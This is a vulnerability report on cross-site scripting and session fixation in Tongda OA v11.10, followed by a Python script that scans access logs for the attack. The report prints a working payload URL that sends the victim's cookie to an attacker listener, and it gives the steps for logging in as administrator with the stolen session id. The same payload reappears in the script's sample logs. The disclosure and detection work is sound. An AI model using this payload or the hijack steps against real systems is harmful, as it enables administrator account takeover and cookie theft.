| Field | Value |
|---|---|
| Title | The presence of XSS in Tongda v11.10 may allow an attacker to obtain the administrator cookie to log in to the backend |
| Description | Hi~, I found an XSS in Tongda OA v11.10, which can leak the administrator cookie through a malicious link constructed by the attacker. At the same time, v11 has session fixation, and the attacker can log in to the administrator backend through the obtained SESSIONID. The reproduction process is as follows. Construct the payload: `` http://xxx.xxx.xxx.xxx/general/ipanel/menu_code.php?MENU_TYPE=FAV&OA_SUB_WINDOW=)%df%22onmouseover=fetch(`http://192.168.110.160:4444?${document.cookie}` );//%df%22 ``. Listen on port 4444 on the attacker server, when the victim clicks on the link and the mouse hovers over the word "Settings". Then you can append `?SESSIONID=xxx` (the obtained SESSIONID) after `/general/index.php` to log in to the administrator backend. Official website: https://www.tongda2000.com/. Version: v11.10, v2017. Route: `general/ipanel/menu_code.php` |
| Source | https://github.com/Mykonos-x/cve/tree/main/cve/tongda/v11/xss |
| User | AnatomyX (UID 45354) |
| Submission | 12.09.2023 14:55 (3 years ago) |
| Moderation | 16.09.2023 14:34 (4 days later) |
| Status | Accepted |
| VulDB Entry | 239868 [Tongda OA 11.10 menu_code.php?MENU_TYPE=FAV OA_SUB_WINDOW Cross Site Scripting] |
| Points | 20 |
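A detection pass a defender could run over web-server access logs for the two patterns in this report: a value that breaks out of its HTML attribute in the `OA_SUB_WINDOW` parameter of `menu_code.php`, and a `SESSIONID` supplied in the URL to `index.php`. This is an added example, not code from the submitter, VulDB or Tongda; the log format, sample lines, client addresses and session id are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = r'''
10.0.0.5 - - [12/Sep/2023:14:55:01 +0800] "GET /general/ipanel/menu_code.php?MENU_TYPE=FAV&OA_SUB_WINDOW=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Sep/2023:14:55:07 +0800] "GET /general/ipanel/menu_code.php?MENU_TYPE=FAV&OA_SUB_WINDOW=)%df%22onmouseover=fetch(`http://192.168.110.160:4444?${document.cookie}`);//%df%22 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Sep/2023:14:56:30 +0800] "GET /general/index.php?SESSIONID=0123456789abcdef HTTP/1.1" 302 0 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Tokens that let a reflected value escape an HTML attribute: quotes, angle
# brackets, an on*= handler, a javascript: URL, or a direct cookie read.
ATTR_BREAKOUT_RE = re.compile(
    r'["\'<>]|\bon[a-z]+\s*=|javascript:|document\.cookie', re.IGNORECASE
)

def inspect_request(target: str) -> list[str]:
    """Return finding labels for one request target (path plus query string)."""
    parts = urlsplit(target)
    # latin-1 keeps the lone 0xDF byte from the payload as a character instead
    # of raising, so the quote that follows it is still visible to the regex.
    query = parse_qs(parts.query, keep_blank_values=True,
                     encoding='latin-1', errors='replace')
    findings = []
    if parts.path.endswith('/general/ipanel/menu_code.php'):
        for value in query.get('OA_SUB_WINDOW', []):
            if ATTR_BREAKOUT_RE.search(value):
                findings.append('menu_code.php: OA_SUB_WINDOW breaks out of its attribute (reflected XSS attempt)')
                break
    if parts.path.endswith('/general/index.php') and 'SESSIONID' in query:
        # A session id accepted from the URL is the session-fixation half of the report.
        findings.append('index.php: SESSIONID supplied in URL (session fixation indicator)')
    return findings

def scan_log(text: str) -> list[tuple[str, str, str]]:
    """Return (client ip, timestamp, finding) for every flagged request in the log."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for finding in inspect_request(m['target']):
            hits.append((m['ip'], m['ts'], finding))
    return hits

if __name__ == '__main__':
    for ip, ts, finding in scan_log(SAMPLE_LOG):
        print(f'{ts} {ip}: {finding}')
```

The benign first line produces no finding; the two requests from the second client are flagged, which is the pairing (XSS attempt followed by a URL-borne session id) worth correlating in a SIEM.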